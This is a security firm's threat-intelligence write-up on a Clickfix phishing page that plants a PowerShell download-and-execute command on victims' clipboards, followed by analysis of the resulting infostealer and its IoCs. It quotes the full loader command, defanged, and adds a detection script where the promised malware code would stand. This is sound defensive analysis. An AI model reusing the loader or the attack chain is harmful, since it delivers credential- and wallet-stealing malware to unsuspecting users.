Threat Intelligence: Clickfix Phishing Attack

When victims click the checkbox to begin the "verification", the phishing website silently copies a malicious command into their clipboard. Victims are then prompted to press particular keys, which triggers the download and execution of the malware.

The frontend code shows that the page listens for postMessage events from iframes or parent/child windows. Once it receives the message turnstileSuccess, it calls the function copyTextSilently().

In index_1.html, the code displays the checkbox. Once the victim interacts with it, the page sends a turnstileSuccess message to the parent page.

Clipboard Injection of Malicious Commands

In the copyTextSilently() function:

  • If the Clipboard API conditions are met, it directly calls Clipboard#writeText() to copy the malicious command.
  • Otherwise, it creates a hidden <textarea> element, inserts the command, uses execCommand() to copy it, and finally removes the element.

The code references command_win from the global window object, which is defined in the external script assets/command.js.

Inside command.js, window.command_win is defined to download a malicious script from a remote server and execute it stealthily via PowerShell:

powershell -w h -c "
$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';
$p='$env:USERPROFILE\Music\d.ps1';
(New-Object System.Internet.WebClient).DownloadFile($u,$p);
powershell -w h -ep bypass -f $p"

Clicking the VERIFY button also triggers copyTextSilently(). However, due to browser security restrictions, victims must click on the page once more after pressing VERIFY for the malicious command to be copied successfully.

Analysis of the Malicious Script

The malicious PowerShell script processes an array $mmASoSdDL by joining it into a single string, decoding it from Base64, and converting it into a JSON object.

Hidden Directory Creation

The script checks whether a target directory exists. If not, it creates one and sets its attributes to Hidden and System.

Writing Malicious Files

The script iterates over the files array in the JSON, constructs full paths, decodes the Base64-encoded binary data, and writes it into the hidden directory.

Persistence via Auto-Startup

A shortcut named trntl.lnk is created in the victim's Startup folder, pointing to trntl.exe. The shortcut uses a system icon as a disguise, ensuring the malware executes automatically at login or startup.

Delayed Execution

The script generates a temporary .cmd file with a random name, which uses rundll32 to launch the .exe. After a 60-second delay, the script executes it via cmd.exe /c, and deletes the .cmd file afterwards to erase traces.

Malicious Script Code

Below are the main components of the malicious script (the original code was a single continuous block; line breaks have been added for readability).
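The loader command quoted above and the delayed cmd.exe /c stage described here both leave distinctive process-creation command lines. The following Python is an added example (not SlowMist's code) that scores such command lines against the traits the page describes and extracts the download URL and drop path from the loader; the sample command lines and the indicator names are constructed for this illustration.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed process-creation command lines (as seen in Sysmon Event ID 1 or
# Windows Security Event 4688). The first is the defanged loader quoted above,
# the second mimics the delayed-execution stage, the third is benign admin use.
SAMPLE_CMDLINES = [
    "powershell -w h -c \"$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';"
    "$p='$env:USERPROFILE\\Music\\d.ps1';"
    "(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p\"",
    "cmd.exe /c C:\\Users\\alice\\AppData\\Local\\Temp\\k3f9x.cmd",
    "powershell -NoProfile -Command Get-ChildItem C:\\Logs",
]

# Indicator name -> case-insensitive regex, one per behaviour the page describes:
# hidden window, execution-policy bypass, WebClient download, running a script
# path held in a variable, dropping under the user profile, and the later
# cmd.exe /c launch of a randomly named .cmd from the Temp folder.
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+h(?:idden)?\b",
    "execution_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass\b",
    "webclient_download": r"New-Object\s+System\.Net\.WebClient\)\.DownloadFile",
    "script_from_variable": r"-f(?:ile)?\s+\$\w+\b",
    "userprofile_drop": r"\$env:USERPROFILE",
    "temp_cmd_stage": r"cmd(?:\.exe)?\s+/c\s+\S+\\Temp\\\w+\.cmd\b",
}

@dataclass
class Finding:
    cmdline: str
    stage: str                       # "loader", "delayed_exec" or "benign"
    indicators: list[str] = field(default_factory=list)
    iocs: dict[str, str] = field(default_factory=dict)

def analyze(cmdline: str) -> Finding:
    """Classify one command line and pull out the download URL / drop path."""
    hits = [n for n, rx in INDICATORS.items() if re.search(rx, cmdline, re.I)]
    iocs = {}
    for var, label in (("u", "download_url"), ("p", "drop_path")):
        m = re.search(r"\$" + var + r"='([^']+)'", cmdline)   # $u='...' / $p='...'
        if m:
            iocs[label] = m.group(1)
    if "temp_cmd_stage" in hits:
        stage = "delayed_exec"
    elif len(hits) >= 3:             # several loader traits together, not one alone
        stage = "loader"
    else:
        stage = "benign"
    return Finding(cmdline, stage, hits, iocs)

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        f = analyze(line)
        print(f.stage, f.indicators, f.iocs)
```

Requiring several traits together keeps ordinary PowerShell administration (as in the third sample) from alerting, while the extracted URL and path feed directly into blocklists.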

Dynamic Analysis

The malicious executable was uploaded to VirusTotal, where it was flagged as malware.

(https://www.virustotal.com/gui/file/cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039/detection)

Process Injection

The malware injects code into a legitimate process (regasm.exe), modifying its execution flow so that the benign process runs malicious payloads.

Sensitive Data Collection

Sandbox analysis indicates the malware exhibits typical info-stealing behavior, including:

  • Extracting sensitive data from browsers (Chrome, Chromium, Opera, etc.), such as cookies, saved passwords, and crypto wallets.
  • Targeting email clients (Thunderbird, Windows Mail) to steal accounts and messages.
  • Locating crypto wallet files to steal private keys or wallet data.
  • Extracting FTP credentials.

Keylogging

The malware includes a keylogger to capture keystrokes in real time, including usernames and passwords.

C2 Communication

The malware retrieves its C2 configuration from Pastebin and establishes communication with the malicious IP 217[.]12[.]204[.]47 on ports 9000 and 443. This enables exfiltration of stolen data and receipt of commands.

  • Malicious Pastebin URL: https[:]//pastebin[.]com/raw/rzARed3W
  • The IP and URL are already flagged as malicious on VirusTotal, with the IP geolocated to Greece.
https://www.virustotal.com/gui/ip-address/217.12.204.47
https://www.virustotal.com/gui/url/225eceb2f02ba20308d77ac250e85e43fa927b4d51edb5aa3290679fe17ee72d

Conclusion

This phishing attack leverages social engineering, tricking users into executing malicious commands and ultimately leading to malware installation. Victims who unknowingly run these commands risk theft of sensitive data, including crypto wallet private keys.

The SlowMist security team urges developers and users to remain vigilant when encountering unfamiliar commands. If debugging or command execution is necessary, it should only be carried out in isolated environments that hold no sensitive data.

IoCs

IPs

  • 217[.]12[.]204[.]47

SHA256

  • 4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 — aTu.lim
  • cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 — trntl.exe
  • 60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 — command.js

URLs

  • https[:]//pastebin[.]com:443/raw/rzARed3W
  • 217[.]12[.]204[.]47:443
  • 217[.]12[.]204[.]47:9000
  • http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
  • http[:]//electri[.]billregulator[.]com/aTu.lim

About SlowMist

SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.

SlowMist offers a variety of services that include but are not limited to security audits, threat intelligence, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring), SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.

By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
